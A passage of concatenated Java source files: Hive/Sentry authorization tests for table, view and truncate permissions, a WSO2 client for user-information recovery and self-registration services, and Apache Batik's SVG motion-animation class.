*/ @Test public void testTableViewJoin() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query TBL1 JOIN TBL2 statement.executeQuery("SELECT T1.B FROM " + TBL1 + " T1 JOIN " + TBL2 + " T2 ON (T1.B = T2.B)"); // negative test: test user can't execute query VIEW_1 JOIN TBL2 try { statement.executeQuery("SELECT V1.B FROM VIEW_1 V1 JOIN " + TBL2 + " T2 ON (V1.B = T2.B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL2 to USER_GROUP of * which user1 is a member. 
*/ @Test public void testTableViewJoin2() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on TBL2 statement.executeQuery("SELECT A FROM " + TBL2); // negative test: test user can't execute query VIEW_1 JOIN TBL2 try { statement.executeQuery("SELECT VIEW_1.B FROM VIEW_1 JOIN " + TBL2 + " ON (VIEW_1.B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT " + TBL1 + ".B FROM " + TBL1 + " JOIN " + TBL2 + " ON (" + TBL1 + ".B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL2, VIEW_1 to * USER_GROUP of which user1 is a member. 
*/ @Test public void testTableViewJoin3() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab2", "select_view1") .addPermissionsToRole("select_view1", "server=server1->db=DB_1->table=VIEW_1->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on TBL2 statement.executeQuery("SELECT A FROM " + TBL2); // test user can execute query VIEW_1 JOIN TBL2 statement.executeQuery("SELECT V1.B FROM VIEW_1 V1 JOIN " + TBL2 + " T2 ON (V1.B = T2.B)"); // test user can execute query on VIEW_1 statement.executeQuery("SELECT A FROM VIEW_1"); // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT T1.B FROM " + TBL1 + " T1 JOIN " + TBL2 + " T2 ON (T1.B = T2.B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL1, VIEW_1 to * USER_GROUP of which user1 is a member. 
*/ @Test public void testTableViewJoin4() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_view1") .addPermissionsToRole("select_view1", "server=server1->db=DB_1->table=VIEW_1->action=select") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query VIEW_1 JOIN TBL1 statement.executeQuery("SELECT VIEW_1.B FROM VIEW_1 JOIN " + TBL1 + " ON (VIEW_1.B = " + TBL1 + ".B)"); // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT " + TBL1 + ".B FROM " + TBL1 + " JOIN " + TBL2 + " ON (" + TBL1 + ".B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /*** * Verify truncate table permissions for different users with different * privileges * @throws Exception */ @Test public void testTruncateTable() throws Exception { File dataDir = context.getDataDir(); // copy data file to test dir File dataFile = new File(dataDir, MULTI_TYPE_DATA_FILE_NAME); FileOutputStream to = new FileOutputStream(dataFile); Resources.copy(Resources.getResource(MULTI_TYPE_DATA_FILE_NAME), to); to.close(); policyFile.setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // setup db objects needed by the test Connection connection = context.createConnection(ADMIN1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("DROP TABLE if exists " + TBL1); statement.execute("DROP TABLE if exists " + TBL2); statement.execute("DROP TABLE if exists " + TBL3); statement.execute("CREATE TABLE " + TBL1 + "(B INT, A 
STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("CREATE TABLE " + TBL2 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("CREATE TABLE " + TBL3 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL1); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL2); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL3); // verify admin can execute truncate table statement.execute("TRUNCATE TABLE " + TBL1); assertFalse(hasData(statement, TBL1)); statement.close(); connection.close(); policyFile .addRolesToGroup(USERGROUP1, "all_tab1") .addPermissionsToRole("all_tab1", "server=server1->db=" + DB1 + "->table=" + TBL2) .addRolesToGroup(USERGROUP2, "drop_tab1") .addPermissionsToRole("drop_tab1", "server=server1->db=" + DB1 + "->table=" + TBL3 + "->action=drop", "server=server1->db=" + DB1 + "->table=" + TBL3 + "->action=select") .addRolesToGroup(USERGROUP3, "select_tab1") .addPermissionsToRole("select_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1 + "->action=select"); writePolicyFile(policyFile); connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); // verify all on tab can truncate table statement.execute("TRUNCATE TABLE " + TBL2); assertFalse(hasData(statement, TBL2)); statement.close(); connection.close(); connection = context.createConnection(USER2_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); // verify drop on tab can truncate table statement.execute("TRUNCATE TABLE " + TBL3); assertFalse(hasData(statement, TBL3)); statement.close(); connection.close(); connection = context.createConnection(USER3_1); statement = 
context.createStatement(connection); statement.execute("USE " + DB1); // verify select on tab can NOT truncate table context.assertAuthzException(statement, "TRUNCATE TABLE " + TBL3); statement.close(); connection.close(); } /** * Test queries without from clause. Hive rewrites the queries with dummy db and table * entities which should not trip authorization check. * @throws Exception */ @Test public void testSelectWithoutFrom() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "all_tab1") .addPermissionsToRole("all_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1) .addRolesToGroup(USERGROUP2, "select_tab1") .addPermissionsToRole("select_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1) .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); // test with implicit default database assertTrue(statement.executeQuery("SELECT 1 ").next()); assertTrue(statement.executeQuery("SELECT current_database()").next()); // test after switching database statement.execute("USE " + DB1); assertTrue(statement.executeQuery("SELECT 1 ").next()); assertTrue(statement.executeQuery("SELECT current_database() ").next()); statement.close(); connection.close(); } // verify that the given table has data private boolean hasData(Statement stmt, String tableName) throws Exception { ResultSet rs1 = stmt.executeQuery("SELECT * FROM " + tableName); boolean hasResults = rs1.next(); rs1.close(); return hasResults; } @Test public void testDummyPartition() throws Exception { policyFile.setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // setup db objects needed by the test Connection connection = context.createConnection(ADMIN1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("DROP TABLE if exists " + TBL1); statement.execute("CREATE 
table " + TBL1 + " (a int) PARTITIONED BY (b string, c string)"); statement.execute("DROP TABLE if exists " + TBL3); statement.execute("CREATE table " + TBL3 + " (a2 int) PARTITIONED BY (b2 string, c2 string)"); statement.close(); connection.close(); policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL3 + "->action=insert"); writePolicyFile(policyFile); connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("INSERT OVERWRITE TABLE " + TBL3 + " PARTITION(b2='abc', c2) select a, b as c2 from " + TBL1); statement.close(); connection.close(); } }
/* * Copyright (c) 2016, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.identity.mgt.endpoint.serviceclient; import org.apache.axis2.AxisFault; import org.apache.axis2.client.ServiceClient; import org.wso2.carbon.captcha.mgt.beans.xsd.CaptchaInfoBean; import org.wso2.carbon.identity.mgt.endpoint.IdentityManagementEndpointConstants; import org.wso2.carbon.identity.mgt.endpoint.IdentityManagementServiceUtil; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceIdentityExceptionException; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceIdentityMgtServiceExceptionException; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceStub; import org.wso2.carbon.identity.mgt.stub.beans.VerificationBean; import org.wso2.carbon.identity.mgt.stub.dto.ChallengeQuestionIdsDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserChallengesCollectionDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserChallengesDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserIdentityClaimDTO; import java.rmi.RemoteException; /** * This class invokes the client operations of UserInformationRecoveryService. 
 */
public class UserInformationRecoveryClient {

    // Axis2 stub through which every operation below is invoked.
    private UserInformationRecoveryServiceStub stub;

    /**
     * Initiates UserInformationRecoveryClient instance: builds the service
     * endpoint URL, creates the stub, and authenticates its service client.
     *
     * @throws AxisFault if the service stub cannot be created
     */
    public UserInformationRecoveryClient() throws AxisFault {
        StringBuilder builder = new StringBuilder();
        String serviceURL = null;
        // Concatenate context URL + service endpoint, then collapse any
        // duplicate "//" EXCEPT the one following "http:"/"https:" (the
        // negative lookbehind protects the scheme separator).
        serviceURL = builder.append(IdentityManagementServiceUtil.getInstance().getServiceContextURL()).append
                (IdentityManagementEndpointConstants.ServiceEndpoints.USER_INFORMATION_RECOVERY_SERVICE).toString()
                .replaceAll("(?<!(http:|https:))//", "/");
        stub = new UserInformationRecoveryServiceStub(serviceURL);
        ServiceClient client = stub._getServiceClient();
        IdentityManagementServiceUtil.getInstance().authenticate(client);
    }

    /**
     * Generates a captcha.
     *
     * @return an instance of CaptchaInfoBean which includes captcha information
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public CaptchaInfoBean generateCaptcha() throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.getCaptcha();
    }

    /**
     * Verifies the captcha answer.
     *
     * @param username username of the user
     * @param captcha  an instance of CaptchaInfoBean
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean verifyUser(String username, CaptchaInfoBean captcha) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.verifyUser(username, captcha);
    }

    /**
     * Sends the password recovery notification.
     *
     * @param username username of the user
     * @param key      confirmation code
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean sendRecoveryNotification(String username, String key) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        // The recovery channel is fixed to EMAIL by this client.
        return stub.sendRecoveryNotification(username, key,
                IdentityManagementEndpointConstants.PasswordRecoveryOptions.EMAIL);
    }

    /**
     * Verifies the password recovery notification confirmation.
     *
     * @param username username of the user
     * @param code     confirmation code
     * @param captcha  an instance of CaptchaInfoBean
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean verifyConfirmationCode(String username, String code, CaptchaInfoBean captcha)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.verifyConfirmationCode(username, code, captcha);
    }

    /**
     * Resets the password.
     *
     * @param username         username of the user
     * @param confirmationCode confirmation code
     * @param newPassword      new password
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean resetPassword(String username, String confirmationCode, String newPassword)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        // NOTE: delegates to the service's "updatePassword" operation despite
        // this method being named resetPassword.
        return stub.updatePassword(username, confirmationCode, newPassword);
    }

    /**
     * Returns the question ids of the challenge questions configured by the user.
     *
     * @param username         username of the user
     * @param confirmationCode confirmation code
     * @return an instance of ChallengeQuestionIdsDTO which holds the status and question ids
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public ChallengeQuestionIdsDTO getUserChallengeQuestionIds(String username, String confirmationCode)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.getUserChallengeQuestionIds(username, confirmationCode);
    }

    /**
     * Returns the question corresponded with the provided question id.
     *
     * @param username username of the user
     * @param code     confirmation code
     * @param id       question id
     * @return an instance of UserChallengesDTO which holds the question
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public UserChallengesDTO getChallengeQuestion(String username, String code, String id) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.getUserChallengeQuestion(username, code, id);
    }

    /**
     * Returns the challenge questions configured for the user.
     *
     * @param username         username of the user
     * @param confirmationCode confirmation code
     * @return an instance of UserChallengesCollectionDTO which holds user challenge questions
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public UserChallengesCollectionDTO getChallengeQuestions(String username, String confirmationCode)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.getUserChallengeQuestions(username, confirmationCode);
    }

    /**
     * Verifies the provided answer for the respective question.
     *
     * @param username username of the user
     * @param code     confirmation code
     * @param id       question id
     * @param answer   user answer
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean verifyUserChallengeAnswer(String username, String code, String id, String answer)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.verifyUserChallengeAnswer(username, code, id, answer);
    }

    /**
     * Verifies user answers for the user challenge question set.
     *
     * @param username           username of the user
     * @param confirmationCode   confirmation code
     * @param userChallengesDTOs an array of UserChallengesDTO instances which holds the respective question and answer
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean verifyUserChallengeAnswers(String username, String confirmationCode, UserChallengesDTO[]
            userChallengesDTOs) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.verifyUserChallengeAnswers(username, confirmationCode, userChallengesDTOs);
    }

    /**
     * Returns the claims supported.
     *
     * @param dialect claim dialect
     * @return an array of UserIdentityClaimDTO instances
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityExceptionException on a service-side failure
     */
    public UserIdentityClaimDTO[] getUserIdentitySupportedClaims(String dialect) throws RemoteException,
            UserInformationRecoveryServiceIdentityExceptionException {

        return stub.getUserIdentitySupportedClaims(dialect);
    }

    /**
     * Verifies the captcha answer and recovers the username via the provided claims
     *
     * @param claims       claims of the user
     * @param captcha      an instance of CaptchaInfoBean
     * @param tenantDomain tenant domain
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean verifyAccount(UserIdentityClaimDTO[] claims, CaptchaInfoBean captcha, String tenantDomain)
            throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.verifyAccount(claims, captcha, tenantDomain);
    }

    /**
     * Registers the user.
     *
     * @param userName     username
     * @param password     password
     * @param claims       claims of the user
     * @param profileName  profile name
     * @param tenantDomain tenant domain
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean registerUser(String userName, String password, UserIdentityClaimDTO[] claims, String
            profileName, String tenantDomain) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.registerUser(userName, password, claims, profileName, tenantDomain);
    }

    /**
     * Confirms self registration notification.
     *
     * @param userName     username of the user
     * @param code         confirmation code
     * @param captcha      an instance of CaptchaInfoBean
     * @param tenantDomain tenant domain
     * @return an instance of VerificationBean which denotes the status
     * @throws RemoteException on a transport-level failure
     * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException on a service-side failure
     */
    public VerificationBean confirmUserSelfRegistration (String userName, String code, CaptchaInfoBean captcha,
                                                         String tenantDomain) throws RemoteException,
            UserInformationRecoveryServiceIdentityMgtServiceExceptionException {

        return stub.confirmUserSelfRegistration(userName, code, captcha, tenantDomain);
    }
}
/*
   Licensed to the Apache Software Foundation (ASF) under one or more
   contributor license agreements.  See the NOTICE file distributed with
   this work for additional information regarding copyright ownership.
   The ASF licenses this file to You under the Apache License, Version 2.0
   (the "License"); you may not use this file except in compliance with
   the License.  You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
 */
package org.apache.batik.anim;

import java.awt.geom.Point2D;

import org.apache.batik.anim.timing.TimedElement;
import org.apache.batik.anim.values.AnimatableAngleValue;
import org.apache.batik.anim.values.AnimatableMotionPointValue;
import org.apache.batik.anim.values.AnimatableValue;
import org.apache.batik.dom.anim.AnimatableElement;
import org.apache.batik.ext.awt.geom.Cubic;
import org.apache.batik.ext.awt.geom.ExtendedGeneralPath;
import org.apache.batik.ext.awt.geom.ExtendedPathIterator;
import org.apache.batik.ext.awt.geom.PathLength;
import org.apache.batik.util.SMILConstants;

/**
 * An animation class for 'animateMotion' animations.  Samples a point (and
 * optionally a tangent angle) along a path at each unit time.
 *
 * @author <a href="mailto:cam%40mcc%2eid%2eau">Cameron McCormack</a>
 * @version $Id$
 */
public class MotionAnimation extends InterpolatingAnimation {

    /**
     * The path that describes the motion.
     */
    protected ExtendedGeneralPath path;

    /**
     * The path length calculation object.
     */
    protected PathLength pathLength;

    /**
     * The points defining the distance along the path that the
     * keyTimes apply.  Stored as fractions of total path length.
     */
    protected float[] keyPoints;

    /**
     * Whether automatic rotation should be performed.
     */
    protected boolean rotateAuto;

    /**
     * Whether the automatic rotation should be reversed.
     */
    protected boolean rotateAutoReverse;

    /**
     * The angle of rotation (in radians) to use when automatic rotation is
     * not being used.
     */
    protected float rotateAngle;

    /**
     * Creates a new MotionAnimation.  If {@code path} is null, a path is
     * synthesized from values/from/to/by following SMIL precedence; then
     * keyTimes and keyPoints are validated or derived from the path.
     */
    public MotionAnimation(TimedElement timedElement,
                           AnimatableElement animatableElement,
                           int calcMode,
                           float[] keyTimes,
                           float[] keySplines,
                           boolean additive,
                           boolean cumulative,
                           AnimatableValue[] values,
                           AnimatableValue from,
                           AnimatableValue to,
                           AnimatableValue by,
                           ExtendedGeneralPath path,
                           float[] keyPoints,
                           boolean rotateAuto,
                           boolean rotateAutoReverse,
                           float rotateAngle,
                           short rotateAngleUnit) {
        super(timedElement, animatableElement, calcMode, keyTimes, keySplines,
              additive, cumulative);
        this.rotateAuto = rotateAuto;
        this.rotateAutoReverse = rotateAutoReverse;
        // Normalize the fixed rotation angle to radians whatever unit was given.
        this.rotateAngle = AnimatableAngleValue.rad(rotateAngle, rotateAngleUnit);

        // Phase 1: synthesize a path when none was supplied.
        if (path == null) {
            path = new ExtendedGeneralPath();
            if (values == null || values.length == 0) {
                if (from != null) {
                    // 'from' plus either 'to' (absolute) or 'by' (relative).
                    AnimatableMotionPointValue fromPt = (AnimatableMotionPointValue) from;
                    float x = fromPt.getX();
                    float y = fromPt.getY();
                    path.moveTo(x, y);
                    if (to != null) {
                        AnimatableMotionPointValue toPt = (AnimatableMotionPointValue) to;
                        path.lineTo(toPt.getX(), toPt.getY());
                    } else if (by != null) {
                        AnimatableMotionPointValue byPt = (AnimatableMotionPointValue) by;
                        path.lineTo(x + byPt.getX(), y + byPt.getY());
                    } else {
                        throw timedElement.createException
                            ("values.to.by.path.missing",
                             new Object[] { null });
                    }
                } else {
                    if (to != null) {
                        // A bare 'to' animation starts at the underlying value
                        // and never accumulates.
                        AnimatableMotionPointValue unPt = (AnimatableMotionPointValue)
                            animatableElement.getUnderlyingValue();
                        AnimatableMotionPointValue toPt = (AnimatableMotionPointValue) to;
                        path.moveTo(unPt.getX(), unPt.getY());
                        path.lineTo(toPt.getX(), toPt.getY());
                        this.cumulative = false;
                    } else if (by != null) {
                        // A bare 'by' animation is a relative offset from the
                        // origin and is forced additive.
                        AnimatableMotionPointValue byPt = (AnimatableMotionPointValue) by;
                        path.moveTo(0, 0);
                        path.lineTo(byPt.getX(), byPt.getY());
                        this.additive = true;
                    } else {
                        throw timedElement.createException
                            ("values.to.by.path.missing",
                             new Object[] { null });
                    }
                }
            } else {
                // 'values' list: a polyline through each given point.
                AnimatableMotionPointValue pt = (AnimatableMotionPointValue) values[0];
                path.moveTo(pt.getX(), pt.getY());
                for (int i = 1; i < values.length; i++) {
                    pt = (AnimatableMotionPointValue) values[i];
                    path.lineTo(pt.getX(), pt.getY());
                }
            }
        }
        this.path = path;
        pathLength = new PathLength(path);

        // Phase 2: count drawable segments (everything but moveto) to size the
        // default keyTimes/keyPoints arrays: one key per segment boundary.
        int segments = 0;
        ExtendedPathIterator epi = path.getExtendedPathIterator();
        while (!epi.isDone()) {
            int type = epi.currentSegment();
            if (type != ExtendedPathIterator.SEG_MOVETO) {
                segments++;
            }
            epi.next();
        }

        int count = keyPoints == null ? segments + 1 : keyPoints.length;
        float totalLength = pathLength.lengthOfPath();

        // Phase 3: validate explicit keyTimes, or derive them per calcMode.
        if (this.keyTimes != null && calcMode != CALC_MODE_PACED) {
            if (this.keyTimes.length != count) {
                throw timedElement.createException
                    ("attribute.malformed",
                     new Object[] { null,
                                    SMILConstants.SMIL_KEY_TIMES_ATTRIBUTE });
            }
        } else {
            if (calcMode == CALC_MODE_LINEAR || calcMode == CALC_MODE_SPLINE) {
                // Evenly spaced over [0, 1] with both endpoints included.
                this.keyTimes = new float[count];
                for (int i = 0; i < count; i++) {
                    this.keyTimes[i] = (float) i / (count - 1);
                }
            } else if (calcMode == CALC_MODE_DISCRETE) {
                // Discrete mode divides [0, 1) into count equal steps.
                this.keyTimes = new float[count];
                for (int i = 0; i < count; i++) {
                    this.keyTimes[i] = (float) i / count;
                }
            } else { // CALC_MODE_PACED
                // This corrects the keyTimes to be paced, so from now on
                // it can be considered the same as CALC_MODE_LINEAR.
                // j tracks the segment index including movetos, which are
                // skipped because they contribute no length.
                epi = path.getExtendedPathIterator();
                this.keyTimes = new float[count];
                int j = 0;
                for (int i = 0; i < count - 1; i++) {
                    while (epi.currentSegment() == ExtendedPathIterator.SEG_MOVETO) {
                        j++;
                        epi.next();
                    }
                    this.keyTimes[i] =
                        pathLength.getLengthAtSegment(j) / totalLength;
                    j++;
                    epi.next();
                }
                this.keyTimes[count - 1] = 1f;
            }
        }

        // Phase 4: validate explicit keyPoints, or derive them as the
        // fractional path length at each segment start (same walk as above).
        if (keyPoints != null) {
            if (keyPoints.length != this.keyTimes.length) {
                throw timedElement.createException
                    ("attribute.malformed",
                     new Object[] { null,
                                    SMILConstants.SMIL_KEY_POINTS_ATTRIBUTE });
            }
        } else {
            epi = path.getExtendedPathIterator();
            keyPoints = new float[count];
            int j = 0;
            for (int i = 0; i < count - 1; i++) {
                while (epi.currentSegment() == ExtendedPathIterator.SEG_MOVETO) {
                    j++;
                    epi.next();
                }
                keyPoints[i] = pathLength.getLengthAtSegment(j) / totalLength;
                j++;
                epi.next();
            }
            keyPoints[count - 1] = 1f;
        }
        this.keyPoints = keyPoints;
    }

    /**
     * Called when the element is sampled at the given unit time.  This updates
     * the {@link #value} of the animation if active.
     */
    protected void sampledAtUnitTime(float unitTime, int repeatIteration) {
        AnimatableValue value, accumulation;
        float interpolation = 0;
        if (unitTime != 1) {
            // Find the keyTimes interval that contains unitTime.
            int keyTimeIndex = 0;
            while (keyTimeIndex < keyTimes.length - 1
                    && unitTime >= keyTimes[keyTimeIndex + 1]) {
                keyTimeIndex++;
            }
            if (keyTimeIndex == keyTimes.length - 1
                    && calcMode == CALC_MODE_DISCRETE) {
                // Discrete mode holds the last value for the final interval.
                keyTimeIndex = keyTimes.length - 2;
                interpolation = 1;
            } else {
                if (calcMode == CALC_MODE_LINEAR
                        || calcMode == CALC_MODE_PACED
                        || calcMode == CALC_MODE_SPLINE) {
                    if (unitTime == 0) {
                        interpolation = 0;
                    } else {
                        // Fractional position within the current interval.
                        interpolation = (unitTime - keyTimes[keyTimeIndex])
                            / (keyTimes[keyTimeIndex + 1]
                                - keyTimes[keyTimeIndex]);
                    }
                    if (calcMode == CALC_MODE_SPLINE && unitTime != 0) {
                        // XXX This could be done better, e.g. with
                        //     Newton-Raphson.
                        // Bisect the key spline until its x coordinate matches
                        // the linear fraction, then take y as the eased value.
                        Cubic c = keySplineCubics[keyTimeIndex];
                        float tolerance = 0.001f;
                        float min = 0;
                        float max = 1;
                        Point2D.Double p;
                        for (;;) {
                            float t = (min + max) / 2;
                            p = c.eval(t);
                            double x = p.getX();
                            if (Math.abs(x - interpolation) < tolerance) {
                                break;
                            }
                            if (x < interpolation) {
                                min = t;
                            } else {
                                max = t;
                            }
                        }
                        interpolation = (float) p.getY();
                    }
                }
            }
            // Map the keyPoints fraction to an absolute path length and sample
            // the point (and tangent angle, when auto-rotating) there.
            float point = keyPoints[keyTimeIndex];
            if (interpolation != 0) {
                point += interpolation *
                    (keyPoints[keyTimeIndex + 1] - keyPoints[keyTimeIndex]);
            }
            point *= pathLength.lengthOfPath();
            Point2D p = pathLength.pointAtLength(point);
            float ang;
            if (rotateAuto) {
                ang = pathLength.angleAtLength(point);
                if (rotateAutoReverse) {
                    ang += Math.PI;
                }
            } else {
                ang = rotateAngle;
            }
            value = new AnimatableMotionPointValue(null, (float) p.getX(),
                                                   (float) p.getY(), ang);
        } else {
            // unitTime == 1: sample exactly at the end of the path.
            Point2D p = pathLength.pointAtLength(pathLength.lengthOfPath());
            float ang;
            if (rotateAuto) {
                ang = pathLength.angleAtLength(pathLength.lengthOfPath());
                if (rotateAutoReverse) {
                    ang += Math.PI;
                }
            } else {
                ang = rotateAngle;
            }
            value = new AnimatableMotionPointValue(null, (float) p.getX(),
                                                   (float) p.getY(), ang);
        }
        if (cumulative) {
            // Each repeat iteration accumulates from the end-of-path value.
            Point2D p = pathLength.pointAtLength(pathLength.lengthOfPath());
            float ang;
            if (rotateAuto) {
                ang = pathLength.angleAtLength(pathLength.lengthOfPath());
                if (rotateAutoReverse) {
                    ang += Math.PI;
                }
            } else {
                ang = rotateAngle;
            }
            accumulation = new AnimatableMotionPointValue(null, (float) p.getX(),
                                                          (float) p.getY(), ang);
        } else {
            accumulation = null;
        }

        this.value = value.interpolate(this.value, null, interpolation,
                                       accumulation, repeatIteration);
        if (this.value.hasChanged()) {
            markDirty();
        }
    }
}
/*
 * Copyright 2008-2016 Barcelona Supercomputing Center (www.bsc.es)
